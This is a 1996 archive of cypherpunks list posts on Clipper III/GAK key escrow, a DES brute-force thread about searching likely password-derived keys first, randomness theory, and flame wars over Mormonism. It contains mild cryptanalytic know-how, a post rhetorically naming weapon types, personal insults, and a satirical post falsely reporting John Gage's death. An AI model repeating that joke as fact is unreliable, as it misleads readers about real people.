From: "Omegaman" <omega@bigeasy.com>
Date: Sat, 5 Oct 1996 00:16:42 +0800
To: cypherpunks@toad.com
Subject: Jon Katz retracts...thanx Jon
Message-ID: <199610041241.HAA27250@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


"And a final note, on another topic entirely. In Threads and
in my recent columns, I've tried repeatedly to
make the distinction between the original
Cypherpunk mailing list - designed to ensure
anonymous access to information on the Web and,
in other contexts, a techno-anarchist movement -
and the adolescent pinheads using the name
Cypherpunk to successfully block open and free
speech on The Netizen's public forums. They are
not the same thing. The movement to protect
anonymity is an important part of the Web and
the Net. The use of the name to anonymously
attack people is not an embodiment of that
movement, but a perversion of it. 

I didn't make this distinction clear in my
columns this week. Many thanks to the people who
pointed it out." 
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 4 Oct 1996 19:34:16 +0800
To: cypherpunks@toad.com
Subject: Re: "Mormon Asshole?"  re: GAK
In-Reply-To: <k2X9uD23w165w@bwalk.dm.com>
Message-ID: <199610040852.CAA00766@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <k2X9uD23w165w@bwalk.dm.com>, on 10/03/96 
   at 07:35 PM, dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) said:

-.attila <attila@primenet.com> writes:
-.
-.> <pro-GAK mor(m)on propaganda skipped
-.>
-.>   "The only natural criminal class in America, the U.S. Congress" >        
-.> --Mark Twain

-.Mark Twain had some very negative things to say about your criminal cult.
-.

        WRONG, read the entire article.  in the balance he was rather 
    positive in his "review" of the Mormons, particularly family life 
    and work ethic.  the first part of his rambling was critical more
    from the very negative attitude to the Mormons in MIssouri at
    the time Samuel Clemmons was growing up.  The three bloody marches
    in winter with a loss of over 6,000 lifes were less than 10 years 
    history in his childhood.

        One of our most basic beliefs in the 13 Articles of Faith
    (in addition to the ten commandments) is that we believe everyone
    should be allowed to practice the religion of their choice, any 
    religion, as they wish to observe;  we only ask the same of them.

        For instance, when the Catholic Church established a parish in
    Salt Lake City, they had no meeting place.  Brigham Young granted
    them the free use of the Tabernacle on Temple Square why they were
    raising money to build their own church.
    
        The same was true in St. George; the classic tabernacle at
    main & tabernacle was used free of charge by the Catholics until
    they were able to erect their own church, school, etc at 200 N 300W,
    two blocks down the street from Brigham Young's winter residence.

        I have never believed we have been persecuted for religion.
 
        the work ethic, and the extended 'ward' family, where everyone
    cooperated on advancing the community --for instance, one family
    took the responsibility of making soap (nasty job which takes time)
    for everyone, and so on.  This is cooperative "husbandry"/industry, 
    and it was beneficial to everyone; there are numerous others.

        even today, our wards are organized so individual families
    have a "skill" for the ward should we find ourselves isolated
    in a wall street disaster, a natural disaster, or whatever.

        do you have 3 years of food storage?  almost 4,000 lbs.
    and 9,000 gallons of drinking water for 3 years for a family of  
    5?  --that's 72,000 lbs (36 tonnes!... ) almost 10,000 cu. ft.

        we work and we share. which means prosperity, which means
    economic success, which usually means stable, cohesive politics.
    and this too often creates not only jealousy and hostility from our
    non-Mormon neighbors, but fear.  

        therefore, the basest of arguments and untruths are used 
    against us to justify the quick  annihilation of the "offenders in
    our midst."

        but what inflames the anti-mormon passions the most is the 
    paid clergy of other organized religions whose employment is 
    the paid ministry to their flock.  Mormons threaten their jobs; 
    the mormons have no paid ministry; it is all part of our 
    "callings" to do the Lord's work.
 
        The 40,000 young men and women who leave MTC in Provo, 
    and other training centers, each graduation to scatter to every
    country in the world, have earned their *own* money to support 
    themselves on their two year missions. these young men and 
    women return with unbelievably positive attitudes and the 
    satisfaction they earned the money themselves --which took 
    planning and perseverance.

        Dimitri, try reading a balanced analysis of the LDS faith, the
    teachings, and their accomplishments before you jump off and prove
    your ignorance and bigotry...  it will not harm you, and you might
    be surprised at what you learn, particularly "forgiving those who
    trespass against us."  -no retaliation.

        remember, all members are missionaries in a way; noone will
    *ask* you to join. all we do is offer you the opportunity to 
    *investigate* our beliefs and our community.  After *you* study
    the materials and ask questions, it is up to you to get on your 
    knees and ask the Lord if you should join.  We neither ask nor
    tell you you will die an agonizing death, again and again in 
    eternity, if you do not join.  everyone is there own free agent,
    and we can not influence your "free agency"  --we will not
    pursue you if your prayers are not answered; but we will still be
    you friend, and our offer to participate in our services and our
    activities is still extended.

        For instance, I will never attack you with hate speech, and 
    even my sarcasm is questionable, despite the fun a good play on 
    words provides;  you could probably snitch me off to my bishop and
    I would likely face a church council.  As a high priest, that is a 
    serious matter.

        something else you probably do not know:  we NEVER pass the
    plate at any service.  tithing is a private matter.

--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 4 Oct 1996 19:49:48 +0800
To: cypherpunks@toad.com
Subject: Re: "Mormon Asshole?"  re: GAK
In-Reply-To: <k2X9uD23w165w@bwalk.dm.com>
Message-ID: <199610040846.CAA00681@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <k2X9uD23w165w@bwalk.dm.com>, on 10/03/96 
   at 07:35 PM, dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) said:

-.attila <attila@primenet.com> writes:
-.
-.> <pro-GAK mor(m)on propaganda skipped
-.>
-.>   "The only natural criminal class in America, the U.S. Congress" >        
-.> --Mark Twain

-.Mark Twain had some very negative things to say about your criminal cult.
-.

        WRONG, read the entire article.  in the balance he was rather 
    positive in his "review" of the Mormons, particularly family life 
    and work ethic.  the first part of his rambling was critical more
    from the very negative attitude to the Mormons in MIssouri at
    the time Samuel Clemmons was growing up.  The three bloody marches
    in winter with a loss of over 6,000 lifes were less than 10 years 
    history in his childhood.

        One of our most basic beliefs in the 13 Articles of Faith
    (in addition to the ten commandments) is that we believe everyone
    should be allowed to practice the religion of their choice, any 
    religion, as they wish to observe;  we only ask the same of them.

        For instance, when the Catholic Church established a parish in
    Salt Lake City, they had no meeting place.  Brigham Young granted
    them the free use of the Tabernacle on Temple Square why they were
    raising money to build their own church.
    
        The same was true in St. George; the classic tabernacle at
    main & tabernacle was used free of charge by the Catholics until
    they were able to erect their own church, school, etc at 200 N 300W,
    two blocks down the street from Brigham Young's winter residence.

        I have never believed we have been persecuted for religion.
 
        the work ethic, and the extended 'ward' family, where everyone
    cooperated on advancing the community --for instance, one family
    took the responsibility of making soap (nasty job which takes time)
    for everyone, and so on.  This is cooperative "husbandry"/industry, 
    and it was beneficial to everyone; there are numerous others.

        even today, our wards are organized so individual families
    have a "skill" for the ward should we find ourselves isolated
    in a wall street disaster, a natural disaster, or whatever.

        do you have 3 years of food storage?  almost 4,000 lbs.
    and 9,000 gallons of drinking water for 3 years for a family of  
    5?  --that's 72,000 lbs (36 tonnes!... ) almost 10,000 cu. ft.

        we work and we share. which means prosperity, which means
    economic success, which usually means stable, cohesive politics.
    and this too often creates not only jealousy and hostility from our
    non-Mormon neighbors, but fear.  

        therefore, the basest of arguments and untruths are used 
    against us to justify the quick  annihilation of the "offenders in
    our midst."

        but what inflames the anti-mormon passions the most is the 
    paid clergy of other organized religions whose employment is 
    the paid ministry to their flock.  Mormons threaten their jobs; 
    the mormons have no paid ministry; it is all part of our 
    "callings" to do the Lord's work.
 
        The 40,000 young men and women who leave MTC in Provo, 
    and other training centers, each graduation to scatter to every
    country in the world, have earned their *own* money to support 
    themselves on their two year missions. these young men and 
    women return with unbelievably positive attitudes and the 
    satisfaction they earned the money themselves --which took 
    planning and perseverance.

        Dimitri, try reading a balanced analysis of the LDS faith, the
    teachings, and their accomplishments before you jump off and prove
    your ignorance and bigotry...  it will not harm you, and you might
    be surprised at what you learn, particularly "forgiving those who
    trespass against us."  -no retaliation.

        remember, all members are missionaries in a way; noone will
    *ask* you to join. all we do is offer you the opportunity to 
    *investigate* our beliefs and our community.  After *you* study
    the materials and ask questions, it is up to you to get on your 
    knees and ask the Lord if you should join.  We neither ask nor
    tell you you will die an agonizing death, again and again in 
    eternity, if you do not join.  everyone is there own free agent,
    and we can not influence your "free agency"  --we will not
    pursue you if your prayers are not answered; but we will still be
    you friend, and our offer to participate in our services and our
    activities is still extended.

        For instance, I will never attack you with hate speech, and 
    even my sarcasm is questionable, despite the fun a good play on 
    words provides;  you could probably snitch me off to my bishop and
    I would likely face a church council.  As a high priest, that is a 
    serious matter.

        something else you probably do not know:  we NEVER pass the
    plate at any service.  tithing is a private matter.

--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sat, 5 Oct 1996 01:25:20 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: How to fight GAK by obeying the law
In-Reply-To: <199610040457.VAA25485@server1.chromatic.com>
Message-ID: <32550ACC.1894@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua wrote:

> First thing we definitely need is a way to determine with fairly good
> accuracy, whether a host is in the U.S.

I really don't see how that's possible, given the possibility of me
taking my laptop to Ecuador, dialing into a stateside ISP, and being
issued an IP address in the ISP's domain.  In other words, anything
that bases a decision on host location by inference on the domain 
will inherently be rooted in the notion that hosts in that domain are
stuck to the ground "nearby".

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sat, 5 Oct 1996 01:25:37 +0800
To: "geeman@best.com>
Subject: Re: DESCrack keyspace partitioning
In-Reply-To: <01BBB163.FC317940@geeman.vip.best.com>
Message-ID: <32550CC5.8F6@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


geeman@best.com wrote:
>
> (P)RNG's just aren't that likely to produce a key of 010101010.....
> nor 001100110011... etc etc 

Right.  A good CSPRNG is ulikely to produce the pattern 010101010101.
It's also unlikely to produce the pattern 0011001100110011.  Oh, and
it's also unlikely to produce 01100100101001011.  In fact, a good
32-bit CSPRNG has only a 1/2^32 chance of producing any particular
bit pattern.  Of course, another way of saying that is that it's just
as likely to get an "obvious" bit pattern as it is to get any other
one.  You can't just throw away part of the keyspace based on such
bogus reasoning.  (There may be other reasons to throw away part of
the keyspace, of course.)

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 5 Oct 1996 00:15:57 +0800
To: cypherpunks@toad.com
Subject: Re: Timmy May the buffoon
In-Reply-To: <199610041200.OAA11852@basement.replay.com>
Message-ID: <TBy0uD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm glad that you agreed with my assessment of Timmy May.

>From remailer@flame.alias.net  Fri Oct  4 08:00:56 1996
>Date: Fri, 4 Oct 1996 14:00:48 +0200 (MET DST)
>Message-Id: <199610041200.OAA11852@basement.replay.com>
>To: dlv@bwalk.dm.com
>From: nobody@flame.alias.net (Anonymous)
>Organization: Flame International Inc.
>Comments: Please report misuse of this automated remailing service to <remailer-admin@flame.alias.net>
>Subject: your idea
>
>
>>Tim is an ignorant asshole who knows nothing about cryptography and floods
>>this mailing list with inane rants and personal attacks.  I recommend that
>>he be massively killfiled.
>
>Gosh, we have never heard this from you before! A new idea.
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 5 Oct 1996 06:11:37 +0800
To: cypherpunks@toad.com
Subject: Re:Clipper III questions
In-Reply-To: <199610040135.SAA24060@slack.lne.com>
Message-ID: <v03007806ae7aecda0e72@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM -0800 10/3/96, Jim McCoy wrote:
>>The recent CDT policy post sez of Clipper III:

>>This reminds me of the understanding between CIA/NSA and their counterparts
>>in British Intelligence.  [...]
>
>While I am not sure that this oft-made claim can actually be proven,

Actually, Bamford documents it in detail in "The Puzzle Palace," 1982. See
the sections on the "UKUSA" or "UK-USA" agreement. More recent reports have
described how the actual sharing is done in a room at Fort Meade between
GCHQ and NSA intercept analysts. The GCHQ guys monitor the U.S. traffic,
and then "summarize it" (as per the UK-USA arrangement) for their American
counterparts. All strictly according to the letter of the law, such as it
is. The practical effect is obvious. (I also heard a report that the
telephone Long Lines, built some decades ago, were deliberately routed
across Indian reservations in several states--for the purposes of the
domestic surveillance laws, Indian reservations have "sovereign nation"
status! Same reason the CIA used the Cabazon Band of Indians lands for
illegal work.)

>it does raise an interesting point:  a large amount of communications
>traffic crosses international boundaries, which country's laws and
>procedures are to be followed when a "legitimate law enforcement need"
>is perceived?  While Americans have become somewhat disenchanted with

This is a very important point, I think. Given that users have little
control over packet routing, mightn't packets get deliberately routed to
jurisdictions where the "Global GAK" policies might be interpreted
favorably? Suppose encrypted traffic between two American sites actually
went by way of a Canadian hop, and Canadian authorities (possibly working
for/with NSA) went to the "Trusted Key Authorities" with a _Canadian_
warrant?

And so on, including some nations whose notions of "search warrants" bear
no resemblance even to our somewhat tattered notions. So much for U.S.
Constitutional protections, even in the post-GAK age.

--Tim May





"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 5 Oct 1996 05:51:22 +0800
To: cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <3254976E.7F3@gte.net>
Message-ID: <4Ly0uD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> Deana Holmes wrote:
> > On  2 Oct 96 at 8:47, John C. Randolph wrote:
> > > Moroni says:
> > > >I never cease to be surprised by the interest that gentiles show
> > > >in working mormon communities while totally neglecting their own
> > > >failing areas.
>
> > > I don't do a lot of nit-picking on this mailing list, but:
> > > I am a Jew. *You* are a gentile. So are all the rest of the mormons.
> > > Get this point straight.
>
> > Uh, in Utah, Jews are Gentiles. No lie.
>
> I hope I can add something useful to this:
>
> There are quite a few religious groups which claim Zionist spinoff
> beliefs.  Rastafarians (spelling OK?), Mormons, Jews, Christians, and
> probably a host of others.  Some of these groups specifically exclude
> others who make similar claims.  There is good evidence that the Jews,
> to name one example, did not originally (whenever that was) make claim
> to being a Chosen People, etc., but added it later.  Certainly Mormons
> and other Christians "added it later", no question about that.
>
> St. Paul in the Christian "new testament" makes it quite clear that, at
> least from his time onward, the value of being a Jew is in the spirit,
> not in the flesh.  Deep stuff, indeed.
>
> Then there's the question of how one obtains the "right to exist" as an
> ethnic identity, hopefully without having to exterminate someone else.
> I for one was raised in a very conservative Christian culture, and we
> were taught that God "gave" Canaan (later Israel) to the Israelis, when
> it was already occupied.  Refer to Dick Gregory's comments about
> Columbus "discovering" America, and how he should be able to go downtown
> and "discover" himself a Cadillac.
>
> BTW, in a review of HP products I once read (they made the first
> personal computers, circa 1966 I believe), it said that HP people, in
> their main plants in Corvallis OR and Ft. Collins CO, had a really great
> "work ethic", and that they were almost all Mormons and "born again"
> Christians.  That probably says more about homogenous culture than about
> any particular culture, I would guess.
>
> Bottom line for me is, I sincerely appreciate a lot of the good values
> some of these religions bring to their followers, but let's be serious,
> if any of these groups get too much power, look the *hell* out!
>
> P.S.  I cringe every time I hear one of the CNN bozos pronounce Israel
>       as in real estate, or get real.  I think they all have to attend
>       the Rick Dees school of broadcasting, so it's a standard, like
>       GAK or something is going to be the standard.
>
>

What is the crypto-relevance of the above-quoted passage?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Sat, 5 Oct 1996 05:09:22 +0800
To: "'Gary Howland'" <gary@systemics.com>
Subject: RE: DESCrack keyspace partitioning
Message-ID: <01BBB1D1.92DA93A0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Re: DESCrack keyspace partitioning

geeman@best.com wrote:
> 
> What about the heuristics of partitioning the keyspace?
> 
> Seems to me that a _subset_ of all possible keys is much more likely
> to appear than a random selection from an equidistributed population 0..2^56.
> 
> (P)RNG's just aren't that likely to produce a key of 010101010.....
> nor 001100110011...

Why?  They seem just as likely as any other sequence.

I left out a piece: again heuristically speaking, most DES keys are derived from pasword hash, or
similar technique.  In such a case the statistics of the generated keys are (it looks like) _highly_
skewed.

 etc etc and I have been thinking about how one might formalize
> and exploit this randomness property to increase the probability of finding the key sooner.

Again, which randomness property?

The property that essentially _no_ predictability is found in a hash-derived key.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Sat, 5 Oct 1996 05:29:16 +0800
To: "'m5@tivoli.com>
Subject: RE: DESCrack keyspace partitioning
Message-ID: <01BBB1D1.94D09740@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Another thinking step: most real-world DES keys are derived from hashes.
Not (P)RNGs.
The distributions are **not** uniform.
I am talking about FAMILIES of predictable bit patterns in keys, not any specific pattern.
I'm doing the stats.

The goal is to search the most likely keys first, and 
not all keys are created equally.

Your reasoning is thin.


----------
From: 	Mike McNally[SMTP:m5@tivoli.com]
Sent: 	Friday, October 04, 1996 6:10 AM
To: 	geeman@best.com
Cc: 	'cypherpunks@toad.com'
Subject: 	Re: DESCrack keyspace partitioning

geeman@best.com wrote:
>
> (P)RNG's just aren't that likely to produce a key of 010101010.....
> nor 001100110011... etc etc 

Right.  A good CSPRNG is ulikely to produce the pattern 010101010101.
It's also unlikely to produce the pattern 0011001100110011.  Oh, and
it's also unlikely to produce 01100100101001011.  In fact, a good
32-bit CSPRNG has only a 1/2^32 chance of producing any particular
bit pattern.  Of course, another way of saying that is that it's just
as likely to get an "obvious" bit pattern as it is to get any other
one.  You can't just throw away part of the keyspace based on such
bogus reasoning.  (There may be other reasons to throw away part of
the keyspace, of course.)

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Sat, 5 Oct 1996 04:50:15 +0800
To: "'jbugden@smtplink.alis.ca>
Subject: RE: DESCrack keyspace partitioning
Message-ID: <01BBB1D1.991B3940@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, but you are ASSUMING that which I 
dispute.

The point I am making is that keys in the real world
are not uniformly distributed.

Some results forthcoming.


Suppose we have a function f() that randomly chooses an integer between 1 and
100 such that each integer in the range is equally likely to be selected on each
call. 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


If we call f() 6 times, each time noting whether the result is even or
odd, which of the following sequences is more likely?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 5 Oct 1996 06:36:33 +0800
To: cypherpunks@toad.com
Subject: Very brief comments on LDS/Mormons
In-Reply-To: <k2X9uD23w165w@bwalk.dm.com>
Message-ID: <v03007808ae7af10d0afb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I suppose I'm chagrinned that a thread I named, "Utah as a Religious Police
State," has been followed by *so many* religious flames, pro- and con-
Mormonism. (I use Mormonism as shorthand for LDS...sosumi.)

My point was not to attack Mormonism, esp. the religious beliefs.
Personally, I think cults are useful in keeping people off the streets
(better than police-enforced curfews). I was mainly challenging Attila's
glowing opinion of how his community "enforces curfews big time." Telling
people when they can be on public streets and when they cannot is no
different than telling them what they can read and what they cannot.

("Telling them" in the sense of backing it up with the power of the state.
For example, the LDS church is perfectly free to "tell" its members not to
read the books of, say, Juanita Brooks. However, this may not be enforced
by the government or its police and court arms, so long as Utah is part of
these United States. Period.)

Personally, I find Mormonism to be a good "survival meme."
Self-preparedness, food storage, self-reliance, etc., are all counter to
the "I'll just let government take care of me" meme which is so common in
the rest of society. I don't cotton to supernatural explanations of the
world, though, so I've never been in involved in any religion (past age 11).

This is the last thing I'll say on Mormonism. Whether some subset of
settlers committed some set of crimes in Mountain Meadows is a footnote in
history--who really cares about such anomalies? I care more about the
present.

I still urge Attila to rethink his enthusiastic support of state-enforced
curfews, or state-imposed bans on alcohol (not that I recall him supporting
this particular law), etc.

--Tim

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 5 Oct 1996 06:33:26 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: ADJ_ust
Message-ID: <v02130500ae7a827a3700@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Ya' know, I keep seeing government references to all this terrorist
technology and know-how on the Net, but when I do some pretty exhaustive
searches I come up pretty-much empty handed.  Are their claims just
rhetoric or am I incompetent at using Web search tools?  For example, where
can one find on the Net: the means to anonymously purchase CBW precursors
or strains, manufacuting and know-how? Where can one find practical EMP
designs and components?  Where can one find practical Fuel/air explosives
device construction info?

I'm sure you can think of other significant items I've left out.  Hope you
get the picture.

>On Wed, 2 Oct 1996, Adamsc wrote:
>
>> I have strong
>> doubts that someone would come up with a non-nuke that could destroy stuff
>> indiscriminately within a useably large area.
>
>Fuel/air bombs.
>
>--Lucky






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sat, 5 Oct 1996 04:26:50 +0800
To: cypherpunks@toad.com
Subject: Re: Can we kill single DES?
In-Reply-To: <19961004020539265.AAB223@GIGANTE>
Message-ID: <Pine.BSI.3.91.961004091150.24933A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Oct 1996, Adamsc wrote:

> A Linux port (Pentium) would be *very* good - lots of Linux people tend to by
> pro-cpunk.  Ditto for OS/2.   And who knows, if you hyped the business
> aspects enough you might even find IBM or some other large corp willing to
> donate some time on large system.

    Maybe Deep Blue gets bored in between its chess matches. :)

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
             'DISA information shows that computer attacks on the 
          Department of Defense are successful 65 percent of the time.
        The DoD, despite its problems, probably has one of the strongest
         computer security programs in government.' -GAO/T-AIMD-96-108





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 5 Oct 1996 08:41:04 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Fighting Clipper III
Message-ID: <199610041617.JAA17746@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:37 PM 10/3/96 -0700, Declan McCullagh wrote:
>IBM truly does deserve to be criticized, soundly. When I get a chance I'll
>write up the report of what happened at yesterday's IBM "let's recruit
>industry to join our alliance" confab session that took place in the
>afternoon at their DC lobby-office. It was supposedly closed to the 
>press. :)
>
>-Declan

If those "Big Brother Inside" stickers are re-printed, in fine print should 
be included a web-page at which more information could be obtained.  See, I 
anticipate actually visiting local hardware/software sellers and placing 
those labels.  Including an address would allow people to get far more 
information, and get involved.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 5 Oct 1996 09:44:55 +0800
To: "cypherpunks@toad.com>
Subject: Re: DESCrack keyspace partitioning
In-Reply-To: <01BBB163.FC317940@geeman.vip.best.com>
Message-ID: <v03007809ae7af74d82e0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:48 PM -0700 10/3/96, geeman@best.com wrote:
>What about the heuristics of partitioning the keyspace?
>
>Seems to me that a _subset_ of all possible keys is much more likely
>to appear than a random selection from an equidistributed population 0..2^56.
>
>(P)RNG's just aren't that likely to produce a key of 010101010.....
>nor 001100110011... etc etc and I have been thinking about how one might
>formalize
>and exploit this randomness property to increase the probability of
>finding the key sooner.


A PRNG is of course "just as likely" to produce 01010101010101...010101 as
it is to produce, say, "01110011101010....010100001010001001010 or any
other of the possible seequences. The key is that 01010101010101...010101
is a "special sequence," just like a "royal flush" is a "special hand" in
poker.

The formalism for this is "algorithmic information theory," or "descriptive
complexity theory," developed more or less independently by Kolmogoroff,
Chaitin, Martin-Lof, and others, mostly in the 1960s. The core idea is
this: "a number is random if it has no shorter description than itself."
That is, a random number is not compressible.

In the example above, the sequence "01010101010101...010101" has a simple
generating algorithm: "alternating 0s and 1s," and this is a shorter
description than the actual sequence. Naturally, there are relatively few
sequences with short descriptions (translation: "nearly all" sequences
"look to be random").

(One of the exciting conclusions is that no number can ever be _proved_ to
be random, via the Halting Problem, so I use the very term "random" with
this in mind. Substitute a more nuanced "a number believed to be random"
for every occurrence of "random." We can say that a number was generated
from, say, what we believe to be a "naturally random" process, e.g.,
radioactive decay, but we cannot prove the number is random. We can of
course prove it to be nonrandom if we can find a generator which
consistently generates it. This is the essence of von Neumann's comment
that the output of a PRNG algorithm cannot be random.)

These ideas are closely related to notions of entropy, compressibility,
etc. The standard works in English are by Gregory Chaitin, at IBM. He has
several books out, including a collection of his articles, "Information and
Randomness." Also, several readable articles in "Scientific American."

He also has an extensive Web site, last I looked, so some searches on his
name and/or algorithmic information theory should produce good results.


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 5 Oct 1996 09:36:31 +0800
To: cypherpunks@toad.com
Subject: Re: Did Sun get a sweetheart deal?
In-Reply-To: <199610040109.SAA23900@slack.lne.com>
Message-ID: <v0300780aae7afca2c37b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:50 AM -0400 10/4/96, Simon Spero wrote:
>On Thu, 3 Oct 1996, Eric Murray wrote:
>> In addition, I had lunch today with the people I used to work
>> with/for at Sun, who're probably the most likely to be asked to implement
>> such a thing.  They haven't heard anything about it and were quite dismayed
>> at the whole idea.
>
>I'd love to know what John Gage says about this, since in the past I
>believe he's used been "Over My Dead Body" on GAK.

You hadn't heard?

Sadly, John Gage was run over in the Sun Microsystems parking lot two weeks
ago.
The driver was not apprehended, but an APB for hit-and-run is out on black
Ford  Contintental with the license plate "WeBeSpooks."

Jim Bidzos was narrowly missed by the same car, and now supports GAK.


--Klaus! von Future Prime


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 5 Oct 1996 04:31:09 +0800
To: "geeman@best.com>
Subject: RE: DESCrack keyspace partitioning
